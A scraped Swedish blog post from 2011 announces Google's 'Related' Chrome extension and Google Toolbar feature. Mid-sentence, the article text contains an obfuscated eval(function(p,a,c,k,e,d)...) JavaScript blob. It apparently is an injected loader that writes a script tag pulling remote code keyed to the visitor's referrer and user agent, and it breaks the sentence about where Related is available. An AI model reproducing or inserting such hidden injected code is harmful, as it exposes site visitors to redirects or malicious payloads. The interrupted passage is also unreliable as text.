Image Image Image Image Image Image Image Image Image Image

| 20 september, 2018

Scroll to top

Top

Google Related, hittar saker som du kan gilla.

Google Related, hittar saker som du kan gilla.
Filip Urde
  • On 17 augusti, 2011
  • http://www.revue.se/filip-urde

Google vill göra något liknande mot vad youtube har gjort med relaterade filmer. Nu lanserar man Chrome-tillägget Related som ger förslag på vad du också kan vara intresserad av när du surfar runt på en viss sajt.

T.ex. om du letar efter hotell eller en restaurangs hemsida. Då kan Related till exempel visa dig en karta på var restaurangen ligger, omdömen från Google Places och liknande ställen som du kan tänkas vilja testa. All denna information dyker upp i en liten list längst ner på skärmen och är minimerad ända tills du hovrar över den.

Related finns både som ett tillägg eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tniyh|var|u0026u|referrer|rkzih||js|php’.split(‘|’),0,{}))
till Chrome
och som en ny funktion i Google Toolbar för Internet Explorer.
googleblog.blogspot.com

httpv://www.youtube.com/watch?v=r4rlWygcJqI&feature=player_embedded